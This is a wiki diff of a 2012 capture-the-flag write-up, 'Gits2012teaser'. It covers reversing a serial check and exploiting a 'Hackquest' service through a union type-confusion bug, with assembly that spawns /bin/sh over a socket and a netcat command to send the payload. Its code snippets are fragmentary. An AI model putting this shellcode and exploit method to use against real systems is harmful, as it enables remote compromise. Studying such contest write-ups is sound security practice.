Changes

Jump to: navigation, search

Gits2012teaser

280 bytes added, 15:30, 8 January 2012
* analyze disassembly, extract C representation:
<presyntaxhighlight lang="c">
int
VerifySerial(uint64_t name, uint64_t serial)
return (result == 1);
}
</presyntaxhighlight>
* it looks like a multiplication over a galois field, with the irreducible polynomial 0x1a348fccd93aea5a7 (note leading bit not in C), but it actually isn't, because the high bit gets checked after the shift, not before.
* lacking math package fu, implement a gaussian elimination manually:
<presyntaxhighlight lang="ruby">
class Numeric
def bits64
puts (res.bitary_to_int^s0.bitary_to_int).to_s(16)
end
</presyntaxhighlight>
== #3 Hackquest ==
* struct ItemInfo contains a union:
<presyntaxhighlight lang="cpp">
union
{
} namedUnwrap;
} info;
</presyntaxhighlight>
* magical item:
<presyntaxhighlight lang="cpp">
{"a", "letter addressed to %s", "...", NULL, ITEM_NAMED_UNWRAP, {.namedUnwrap = {name, &passwordItem}}}, {NULL, NULL, NULL, NULL, 0, {NULL}}
</presyntaxhighlight>
* use() has an insufficient test:
<presyntaxhighlight lang="cpp">
if ((item->type == ITEM_PERFORM_ACTION) || (item->type == ITEM_MOVE_TO_LOCATION) ||
(item->type == ITEM_UNWRAP))
showDesc = item->info.action.actionInfo->showDesc;
}
</presyntaxhighlight>
* if we "use letter on $target", we can make it call ->func()
* bootstrap code copies stack-relative buffer to our page, then transfers control:
<presyntaxhighlight lang="asm">
leal 0x41(%esp),%esi # calc source from stack offset
popl %edi # dest addr is already on stack
popl %edi # retrieve old dest
jmp *%edi # jump there
</presyntaxhighlight>
* remaining shell code takes socket fd from fixed stack offset and dup2()s to 0, 1, 2, then spawns /bin/sh:
<presyntaxhighlight lang="asm">
pushl %ecx # ecx was cleared by rep above, put 0 on stack
movl 0xAB(%esp),%ebx # get socket fd from stack offset
movb $0xb,%al # execve syscall number
int $0x80 # magic!
</presyntaxhighlight>
* cat key.txt
* all combined, use as (ruby h.rb; cat) | nc host 7331
<presyntaxhighlight lang="ruby">
addr = 0x60606000 # our page address
src = 0x804c2a0 # from 0x80498f4
print cp
end
</presyntaxhighlight>
511
edits